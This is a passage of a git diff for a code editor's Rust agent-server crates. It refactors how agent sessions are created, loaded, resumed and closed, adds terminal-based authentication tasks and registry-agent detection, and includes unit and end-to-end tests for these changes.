- } - } + self.apply_default_config_options(&response.session_id, config_opts, cx); } let action_log = cx.new(|_| ActionLog::new(project.clone())); let thread: Entity = cx.new(|cx| { AcpThread::new( None, - self.display_name.clone(), + None, + Some(work_dirs), self.clone(), project, action_log, @@ -598,9 +699,10 @@ impl AgentConnection for AcpConnection { fn load_session( self: Rc, - session: AgentSessionInfo, + session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, + title: Option, cx: &mut App, ) -> Task>> { if !self.agent_capabilities.load_session { @@ -608,29 +710,29 @@ impl AgentConnection for AcpConnection { "Loading sessions is not supported by this agent.".into() )))); } + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = session - .title - .clone() - .unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, + Some(work_dirs.clone()), self.clone(), project, action_log, - session.session_id.clone(), + session_id.clone(), watch::Receiver::constant(self.agent_capabilities.prompt_capabilities.clone()), cx, ) }); self.sessions.borrow_mut().insert( - session.session_id.clone(), + session_id.clone(), AcpSession { thread: thread.downgrade(), suppress_abort_err: false, @@ -640,25 +742,29 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection .load_session( - acp::LoadSessionRequest::new(session.session_id.clone(), cwd) - .mcp_servers(mcp_servers), + acp::LoadSessionRequest::new(session_id.clone(), cwd).mcp_servers(mcp_servers), ) .await { Ok(response) => response, Err(err) => { - self.sessions.borrow_mut().remove(&session.session_id); + self.sessions.borrow_mut().remove(&session_id); return Err(map_acp_error(err)); } }; let (modes, models, config_options) = config_state(response.modes, response.models, response.config_options); - if let Some(session) = self.sessions.borrow_mut().get_mut(&session.session_id) { + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; session.config_options = config_options.map(ConfigOptions::new); @@ -670,9 +776,10 @@ impl AgentConnection for AcpConnection { fn resume_session( self: Rc, - session: AgentSessionInfo, + session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, + title: Option, cx: &mut App, ) -> Task>> { if self @@ -685,29 +792,29 @@ impl AgentConnection for AcpConnection { "Resuming sessions is not supported by this agent.".into() )))); } + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = session - .title - .clone() - .unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, + Some(work_dirs), self.clone(), project, action_log, - session.session_id.clone(), + session_id.clone(), watch::Receiver::constant(self.agent_capabilities.prompt_capabilities.clone()), cx, ) }); self.sessions.borrow_mut().insert( - session.session_id.clone(), + session_id.clone(), AcpSession { thread: thread.downgrade(), suppress_abort_err: false, @@ -717,25 +824,30 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection .resume_session( - acp::ResumeSessionRequest::new(session.session_id.clone(), cwd) + acp::ResumeSessionRequest::new(session_id.clone(), cwd) .mcp_servers(mcp_servers), ) .await { Ok(response) => response, Err(err) => { - self.sessions.borrow_mut().remove(&session.session_id); + self.sessions.borrow_mut().remove(&session_id); return Err(map_acp_error(err)); } }; let (modes, models, config_options) = config_state(response.modes, response.models, response.config_options); - if let Some(session) = self.sessions.borrow_mut().get_mut(&session.session_id) { + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; session.config_options = config_options.map(ConfigOptions::new); @@ -745,10 +857,53 @@ impl AgentConnection for AcpConnection { }) } + fn supports_close_session(&self) -> bool { + self.agent_capabilities.session_capabilities.close.is_some() + } + + fn close_session( + self: Rc, + session_id: &acp::SessionId, + cx: &mut App, + ) -> Task> { + if !self.supports_close_session() { + return Task::ready(Err(anyhow!(LoadError::Other( + "Closing sessions is not supported by this agent.".into() + )))); + } + + let conn = self.connection.clone(); + let session_id = session_id.clone(); + cx.foreground_executor().spawn(async move { + conn.close_session(acp::CloseSessionRequest::new(session_id.clone())) + .await?; + self.sessions.borrow_mut().remove(&session_id); + Ok(()) + }) + } + fn auth_methods(&self) -> &[acp::AuthMethod] { &self.auth_methods } + fn terminal_auth_task( + &self, + method_id: &acp::AuthMethodId, + cx: &App, + ) -> Option { + let method = self + .auth_methods + .iter() + .find(|method| method.id() == method_id)?; + + match method { + acp::AuthMethod::Terminal(terminal) if cx.has_flag::() => { + Some(terminal_auth_task(&self.command, &self.id, terminal)) + } + _ => meta_terminal_auth_task(&self.id, method_id, method), + } + } + fn authenticate(&self, method_id: acp::AuthMethodId, cx: &mut App) -> Task> { let conn = self.connection.clone(); cx.foreground_executor().spawn(async move { @@ -915,6 +1070,149 @@ fn map_acp_error(err: acp::Error) -> anyhow::Error { } } +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn terminal_auth_task_reuses_command_and_merges_args_and_env() { + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into(), "--verbose".into()], + env: Some(HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "base".into()), + ])), + }; + let method = acp::AuthMethodTerminal::new("login", "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([ + ("EXTRA".into(), "2".into()), + ("SHARED".into(), "override".into()), + ])); + + let terminal_auth_task = terminal_auth_task(&command, &AgentId::new("test-agent"), &method); + + assert_eq!( + terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "--verbose", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "override".into()), + ("EXTRA".into(), "2".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + assert_eq!(terminal_auth_task.command_label, "Login"); + } + + #[test] + fn legacy_terminal_auth_task_parses_meta_and_retries_session() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["auth", "--interactive"], + "env": { + "AUTH_MODE": "interactive", + }, + }), + )])), + ); + + let terminal_auth_task = + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method) + .expect("expected legacy terminal auth task"); + + assert_eq!( + terminal_auth_task.id.0, + "external-agent-test-agent-legacy-login-login" + ); + assert_eq!(terminal_auth_task.command.as_deref(), Some("legacy-agent")); + assert_eq!(terminal_auth_task.args, vec!["auth", "--interactive"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([("AUTH_MODE".into(), "interactive".into())]) + ); + assert_eq!(terminal_auth_task.label, "legacy /auth"); + } + + #[test] + fn legacy_terminal_auth_task_returns_none_for_invalid_meta() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + }), + )])), + ); + + assert!( + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method).is_none() + ); + } + + #[test] + fn first_class_terminal_auth_takes_precedence_over_legacy_meta() { + let method_id = acp::AuthMethodId::new("login"); + let method = acp::AuthMethod::Terminal( + acp::AuthMethodTerminal::new(method_id, "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([( + "AUTH_MODE".into(), + "first-class".into(), + )])) + .meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["legacy-auth"], + "env": { + "AUTH_MODE": "legacy", + }, + }), + )])), + ); + + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into()], + env: Some(HashMap::from_iter([("BASE".into(), "1".into())])), + }; + + let terminal_auth_task = match &method { + acp::AuthMethod::Terminal(terminal) => { + terminal_auth_task(&command, &AgentId::new("test-agent"), terminal) + } + _ => unreachable!(), + }; + + assert_eq!( + terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("AUTH_MODE".into(), "first-class".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + } +} + fn mcp_servers_for_project(project: &Entity, cx: &App) -> Vec { let context_server_store = project.read(cx).context_server_store().read(cx); let is_local = project.read(cx).is_local(); @@ -1169,7 +1467,7 @@ impl acp::Client for ClientDelegate { let outcome = task.await; - Ok(acp::RequestPermissionResponse::new(outcome)) + Ok(acp::RequestPermissionResponse::new(outcome.into())) } async fn write_text_file( @@ -1374,10 +1672,10 @@ impl acp::Client for ClientDelegate { Ok(acp::CreateTerminalResponse::new(terminal_id)) } - async fn kill_terminal_command( + async fn kill_terminal( &self, - args: acp::KillTerminalCommandRequest, - ) -> Result { + args: acp::KillTerminalRequest, + ) -> Result { self.session_thread(&args.session_id)? .update(&mut self.cx.clone(), |thread, cx| { thread.kill_terminal(args.terminal_id, cx) diff --git a/crates/agent_servers/src/agent_servers.rs b/crates/agent_servers/src/agent_servers.rs index a07226ca25095fdb7037114d32d5033364a4999f..2016e5aaaa27b62c956c5eee49c989172980de49 100644 --- a/crates/agent_servers/src/agent_servers.rs +++ b/crates/agent_servers/src/agent_servers.rs @@ -9,50 +9,40 @@ use collections::{HashMap, HashSet}; pub use custom::*; use fs::Fs; use http_client::read_no_proxy_from_env; -use project::agent_server_store::AgentServerStore; +use project::{AgentId, Project, agent_server_store::AgentServerStore}; use acp_thread::AgentConnection; use anyhow::Result; -use gpui::{App, AppContext, Entity, SharedString, Task}; -use project::Project; +use gpui::{App, AppContext, Entity, Task}; use settings::SettingsStore; use std::{any::Any, rc::Rc, sync::Arc}; -pub use acp::AcpConnection; +pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID}; pub struct AgentServerDelegate { store: Entity, - project: Entity, - status_tx: Option>, new_version_available: Option>>, } impl AgentServerDelegate { pub fn new( store: Entity, - project: Entity, - status_tx: Option>, new_version_tx: Option>>, ) -> Self { Self { store, - project, - status_tx, new_version_available: new_version_tx, } } - - pub fn project(&self) -> &Entity { - &self.project - } } pub trait AgentServer: Send { fn logo(&self) -> ui::IconName; - fn name(&self) -> SharedString; + fn agent_id(&self) -> AgentId; fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>>; diff --git a/crates/agent_servers/src/custom.rs b/crates/agent_servers/src/custom.rs index b0669d1fb69e110f0ba206a3579f16738de5e7e2..fb8d0a515244576d2cf02e4989cbd71beca448c7 100644 --- a/crates/agent_servers/src/custom.rs +++ b/crates/agent_servers/src/custom.rs @@ -3,31 +3,35 @@ use acp_thread::AgentConnection; use agent_client_protocol as acp; use anyhow::{Context as _, Result}; use collections::HashSet; -use credentials_provider::CredentialsProvider; use fs::Fs; -use gpui::{App, AppContext as _, SharedString, Task}; +use gpui::{App, AppContext as _, Entity, Task}; use language_model::{ApiKey, EnvVar}; -use project::agent_server_store::{ - AllAgentServersSettings, CLAUDE_AGENT_NAME, CODEX_NAME, ExternalAgentServerName, GEMINI_NAME, +use project::{ + Project, + agent_server_store::{AgentId, AllAgentServersSettings}, }; use settings::{SettingsStore, update_settings_file}; use std::{rc::Rc, sync::Arc}; use ui::IconName; +pub const GEMINI_ID: &str = "gemini"; +pub const CLAUDE_AGENT_ID: &str = "claude-acp"; +pub const CODEX_ID: &str = "codex-acp"; + /// A generic agent server implementation for custom user-defined agents pub struct CustomAgentServer { - name: SharedString, + agent_id: AgentId, } impl CustomAgentServer { - pub fn new(name: SharedString) -> Self { - Self { name } + pub fn new(agent_id: AgentId) -> Self { + Self { agent_id } } } impl AgentServer for CustomAgentServer { - fn name(&self) -> SharedString { - self.name.clone() + fn agent_id(&self) -> AgentId { + self.agent_id.clone() } fn logo(&self) -> IconName { @@ -38,7 +42,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -55,7 +59,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -80,23 +84,16 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.to_string(); - update_settings_file(fs, cx, move |settings, _| { + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -131,20 +128,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_mode(&self, mode_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); - update_settings_file(fs, cx, move |settings, _| { + let agent_id = self.agent_id(); + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_mode, .. } @@ -160,7 +150,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -170,20 +160,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_model(&self, model_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); - update_settings_file(fs, cx, move |settings, _| { + let agent_id = self.agent_id(); + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_model, .. } @@ -199,7 +182,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -221,20 +204,13 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); - update_settings_file(fs, cx, move |settings, _| { + let agent_id = self.agent_id(); + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); let favorite_models = match settings { settings::CustomAgentServerSettings::Custom { @@ -263,7 +239,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -279,22 +255,15 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &mut App, ) { - let name = self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.map(|s| s.to_string()); - update_settings_file(fs, cx, move |settings, _| { + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -322,55 +291,33 @@ impl AgentServer for CustomAgentServer { fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>> { - let name = self.name(); - let display_name = delegate - .store - .read(cx) - .agent_display_name(&ExternalAgentServerName(name.clone())) - .unwrap_or_else(|| name.clone()); + let agent_id = self.agent_id(); let default_mode = self.default_mode(cx); let default_model = self.default_model(cx); - let is_previous_built_in = - matches!(name.as_ref(), CLAUDE_AGENT_NAME | CODEX_NAME | GEMINI_NAME); - let (default_config_options, is_registry_agent) = - cx.read_global(|settings: &SettingsStore, _| { - let agent_settings = settings - .get::(None) - .get(self.name().as_ref()); - - let is_registry = agent_settings - .map(|s| { - matches!( - s, - project::agent_server_store::CustomAgentServerSettings::Registry { .. } - ) - }) - .unwrap_or(false); - - let config_options = agent_settings - .map(|s| match s { - project::agent_server_store::CustomAgentServerSettings::Custom { - default_config_options, - .. - } - | project::agent_server_store::CustomAgentServerSettings::Extension { - default_config_options, - .. - } - | project::agent_server_store::CustomAgentServerSettings::Registry { - default_config_options, - .. - } => default_config_options.clone(), - }) - .unwrap_or_default(); - - (config_options, is_registry) - }); - - // Intermediate step to allow for previous built-ins to also be triggered if they aren't in settings yet. - let is_registry_agent = is_registry_agent || is_previous_built_in; + let is_registry_agent = is_registry_agent(agent_id.clone(), cx); + let default_config_options = cx.read_global(|settings: &SettingsStore, _| { + settings + .get::(None) + .get(self.agent_id().as_ref()) + .map(|s| match s { + project::agent_server_store::CustomAgentServerSettings::Custom { + default_config_options, + .. + } + | project::agent_server_store::CustomAgentServerSettings::Extension { + default_config_options, + .. + } + | project::agent_server_store::CustomAgentServerSettings::Registry { + default_config_options, + .. + } => default_config_options.clone(), + }) + .unwrap_or_default() + }); if is_registry_agent { if let Some(registry_store) = project::AgentRegistryStore::try_global(cx) { @@ -383,11 +330,11 @@ impl AgentServer for CustomAgentServer { extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned()); } if is_registry_agent { - match name.as_ref() { - CLAUDE_AGENT_NAME => { + match agent_id.as_ref() { + CLAUDE_AGENT_ID => { extra_env.insert("ANTHROPIC_API_KEY".into(), "".into()); } - CODEX_NAME => { + CODEX_ID => { if let Ok(api_key) = std::env::var("CODEX_API_KEY") { extra_env.insert("CODEX_API_KEY".into(), api_key); } @@ -395,7 +342,7 @@ impl AgentServer for CustomAgentServer { extra_env.insert("OPEN_AI_API_KEY".into(), api_key); } } - GEMINI_NAME => { + GEMINI_ID => { extra_env.insert("SURFACE".to_owned(), "zed".to_owned()); } _ => {} @@ -403,29 +350,26 @@ impl AgentServer for CustomAgentServer { } let store = delegate.store.downgrade(); cx.spawn(async move |cx| { - if is_registry_agent && name.as_ref() == GEMINI_NAME { + if is_registry_agent && agent_id.as_ref() == GEMINI_ID { if let Some(api_key) = cx.update(api_key_for_gemini_cli).await.ok() { extra_env.insert("GEMINI_API_KEY".into(), api_key); } } let command = store .update(cx, |store, cx| { - let agent = store - .get_external_agent(&ExternalAgentServerName(name.clone())) - .with_context(|| { - format!("Custom agent server `{}` is not registered", name) - })?; + let agent = store.get_external_agent(&agent_id).with_context(|| { + format!("Custom agent server `{}` is not registered", agent_id) + })?; anyhow::Ok(agent.get_command( extra_env, - delegate.status_tx, delegate.new_version_available, &mut cx.to_async(), )) })?? .await?; let connection = crate::acp::connect( - name, - display_name, + agent_id, + project, command, default_mode, default_model, @@ -447,7 +391,7 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task> { if let Some(key) = env_var.value { return Task::ready(Ok(key)); } - let credentials_provider = ::global(cx); + let credentials_provider = zed_credentials_provider::global(cx); let api_url = google_ai::API_URL.to_string(); cx.spawn(async move |cx| { Ok( @@ -458,3 +402,198 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task> { ) }) } + +fn is_registry_agent(agent_id: impl Into, cx: &App) -> bool { + let agent_id = agent_id.into(); + let is_in_registry = project::AgentRegistryStore::try_global(cx) + .map(|store| store.read(cx).agent(&agent_id).is_some()) + .unwrap_or(false); + let is_settings_registry = cx.read_global(|settings: &SettingsStore, _| { + settings + .get::(None) + .get(agent_id.as_ref()) + .is_some_and(|s| { + matches!( + s, + project::agent_server_store::CustomAgentServerSettings::Registry { .. } + ) + }) + }); + is_in_registry || is_settings_registry +} + +fn default_settings_for_agent( + agent_id: impl Into, + cx: &App, +) -> settings::CustomAgentServerSettings { + if is_registry_agent(agent_id, cx) { + settings::CustomAgentServerSettings::Registry { + default_model: None, + default_mode: None, + env: Default::default(), + favorite_models: Vec::new(), + default_config_options: Default::default(), + favorite_config_option_values: Default::default(), + } + } else { + settings::CustomAgentServerSettings::Extension { + default_model: None, + default_mode: None, + env: Default::default(), + favorite_models: Vec::new(), + default_config_options: Default::default(), + favorite_config_option_values: Default::default(), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use collections::HashMap; + use gpui::TestAppContext; + use project::agent_registry_store::{ + AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent, + }; + use settings::Settings as _; + use ui::SharedString; + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + fn init_registry_with_agents(cx: &mut TestAppContext, agent_ids: &[&str]) { + let agents: Vec = agent_ids + .iter() + .map(|id| { + let id = SharedString::from(id.to_string()); + RegistryAgent::Npx(RegistryNpxAgent { + metadata: RegistryAgentMetadata { + id: AgentId::new(id.clone()), + name: id.clone(), + description: SharedString::from(""), + version: SharedString::from("1.0.0"), + repository: None, + website: None, + icon_path: None, + }, + package: id, + args: Vec::new(), + env: HashMap::default(), + }) + }) + .collect(); + cx.update(|cx| { + AgentRegistryStore::init_test_global(cx, agents); + }); + } + + fn set_agent_server_settings( + cx: &mut TestAppContext, + entries: Vec<(&str, settings::CustomAgentServerSettings)>, + ) { + cx.update(|cx| { + AllAgentServersSettings::override_global( + project::agent_server_store::AllAgentServersSettings( + entries + .into_iter() + .map(|(name, settings)| (name.to_string(), settings.into())) + .collect(), + ), + cx, + ); + }); + } + + #[gpui::test] + fn test_unknown_agent_is_not_registry(cx: &mut TestAppContext) { + init_test(cx); + cx.update(|cx| { + assert!(!is_registry_agent("my-custom-agent", cx)); + }); + } + + #[gpui::test] + fn test_agent_in_registry_store_is_registry(cx: &mut TestAppContext) { + init_test(cx); + init_registry_with_agents(cx, &["some-new-registry-agent"]); + cx.update(|cx| { + assert!(is_registry_agent("some-new-registry-agent", cx)); + assert!(!is_registry_agent("not-in-registry", cx)); + }); + } + + #[gpui::test] + fn test_agent_with_registry_settings_type_is_registry(cx: &mut TestAppContext) { + init_test(cx); + set_agent_server_settings( + cx, + vec![( + "agent-from-settings", + settings::CustomAgentServerSettings::Registry { + env: HashMap::default(), + default_mode: None, + default_model: None, + favorite_models: Vec::new(), + default_config_options: HashMap::default(), + favorite_config_option_values: HashMap::default(), + }, + )], + ); + cx.update(|cx| { + assert!(is_registry_agent("agent-from-settings", cx)); + }); + } + + #[gpui::test] + fn test_agent_with_extension_settings_type_is_not_registry(cx: &mut TestAppContext) { + init_test(cx); + set_agent_server_settings( + cx, + vec![( + "my-extension-agent", + settings::CustomAgentServerSettings::Extension { + env: HashMap::default(), + default_mode: None, + default_model: None, + favorite_models: Vec::new(), + default_config_options: HashMap::default(), + favorite_config_option_values: HashMap::default(), + }, + )], + ); + cx.update(|cx| { + assert!(!is_registry_agent("my-extension-agent", cx)); + }); + } + + #[gpui::test] + fn test_default_settings_for_extension_agent(cx: &mut TestAppContext) { + init_test(cx); + cx.update(|cx| { + assert!(matches!( + default_settings_for_agent("some-extension-agent", cx), + settings::CustomAgentServerSettings::Extension { .. } + )); + }); + } + + #[gpui::test] + fn test_default_settings_for_agent_in_registry(cx: &mut TestAppContext) { + init_test(cx); + init_registry_with_agents(cx, &["new-registry-agent"]); + cx.update(|cx| { + assert!(matches!( + default_settings_for_agent("new-registry-agent", cx), + settings::CustomAgentServerSettings::Registry { .. } + )); + assert!(matches!( + default_settings_for_agent("not-in-registry", cx), + settings::CustomAgentServerSettings::Extension { .. } + )); + }); + } +} diff --git a/crates/agent_servers/src/e2e_tests.rs b/crates/agent_servers/src/e2e_tests.rs index c5754bcd7610dbf0c858058ea726a746bef37ab1..aa29a0c230c13949b15f2b39a245ae41ead4884d 100644 --- a/crates/agent_servers/src/e2e_tests.rs +++ b/crates/agent_servers/src/e2e_tests.rs @@ -1,7 +1,9 @@ use crate::{AgentServer, AgentServerDelegate}; use acp_thread::{AcpThread, AgentThreadEntry, ToolCall, ToolCallStatus}; use agent_client_protocol as acp; +use client::RefreshLlmTokenListener; use futures::{FutureExt, StreamExt, channel::mpsc, select}; +use gpui::AppContext; use gpui::{Entity, TestAppContext}; use indoc::indoc; use project::{FakeFs, Project}; @@ -13,6 +15,7 @@ use std::{ time::Duration, }; use util::path; +use util::path_list::PathList; pub async fn test_basic(server: F, cx: &mut TestAppContext) where @@ -206,8 +209,10 @@ pub async fn test_tool_call_with_permission( thread.update(cx, |thread, cx| { thread.authorize_tool_call( tool_call_id, - allow_option_id, - acp::PermissionOptionKind::AllowOnce, + acp_thread::SelectedPermissionOutcome::new( + allow_option_id, + acp::PermissionOptionKind::AllowOnce, + ), cx, ); @@ -408,7 +413,9 @@ pub async fn init_test(cx: &mut TestAppContext) -> Arc { let http_client = reqwest_client::ReqwestClient::user_agent("agent tests").unwrap(); cx.set_http_client(Arc::new(http_client)); let client = client::Client::production(cx); - language_model::init(client, cx); + let user_store = cx.new(|cx| client::UserStore::new(client.clone(), cx)); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store, cx); #[cfg(test)] project::agent_server_store::AllAgentServersSettings::override_global( @@ -429,13 +436,18 @@ pub async fn new_test_thread( cx: &mut TestAppContext, ) -> Entity { let store = project.read_with(cx, |project, _| project.agent_server_store().clone()); - let delegate = AgentServerDelegate::new(store, project.clone(), None, None); + let delegate = AgentServerDelegate::new(store, None); - let connection = cx.update(|cx| server.connect(delegate, cx)).await.unwrap(); - - cx.update(|cx| connection.new_session(project.clone(), current_dir.as_ref(), cx)) + let connection = cx + .update(|cx| server.connect(delegate, project.clone(), cx)) .await - .unwrap() + .unwrap(); + + cx.update(|cx| { + connection.new_session(project.clone(), PathList::new(&[current_dir.as_ref()]), cx) + }) + .await + .unwrap() } pub async fn run_until_first_tool_call( diff --git a/crates/agent_settings/Cargo.toml b/crates/agent_settings/Cargo.toml index 01f74de2f2ca5be863dbe27174e5131b9b8a657c..b2db5677dcfdc0994e7ce7a03c9c1dd850eb8514 100644 --- a/crates/agent_settings/Cargo.toml +++ b/crates/agent_settings/Cargo.toml @@ -31,6 +31,7 @@ util.workspace = true fs.workspace = true gpui = { workspace = true, features = ["test-support"] } paths.workspace = true + serde_json_lenient.workspace = true serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } diff --git a/crates/agent_settings/src/agent_settings.rs b/crates/agent_settings/src/agent_settings.rs index 02341af42b9247ba07cb3f8c771a51626cd721ed..0c68d2f25d54f966d1cc0a93476457bbba79c959 100644 --- a/crates/agent_settings/src/agent_settings.rs +++ b/crates/agent_settings/src/agent_settings.rs @@ -5,14 +5,17 @@ use std::sync::{Arc, LazyLock}; use agent_client_protocol::ModelId; use collections::{HashSet, IndexMap}; +use fs::Fs; use gpui::{App, Pixels, px}; use language_model::LanguageModel; use project::DisableAiSettings; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{ - DefaultAgentView, DockPosition, LanguageModelParameters, LanguageModelSelection, - NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode, + DockPosition, DockSide, LanguageModelParameters, LanguageModelSelection, NewThreadLocation, + NotifyWhenAgentWaiting, PlaySoundWhenAgentDone, RegisterSetting, Settings, SettingsContent, + SettingsStore, SidebarDockPosition, SidebarSide, ThinkingBlockDisplay, ToolPermissionMode, + update_settings_file, }; pub use crate::agent_profile::*; @@ -21,11 +24,134 @@ pub const SUMMARIZE_THREAD_PROMPT: &str = include_str!("prompts/summarize_thread pub const SUMMARIZE_THREAD_DETAILED_PROMPT: &str = include_str!("prompts/summarize_thread_detailed_prompt.txt"); +#[derive(Debug, Clone, Default, PartialEq, Eq)] +pub struct PanelLayout { + pub(crate) agent_dock: Option, + pub(crate) project_panel_dock: Option, + pub(crate) outline_panel_dock: Option, + pub(crate) collaboration_panel_dock: Option, + pub(crate) git_panel_dock: Option, + pub(crate) notification_panel_button: Option, +} + +impl 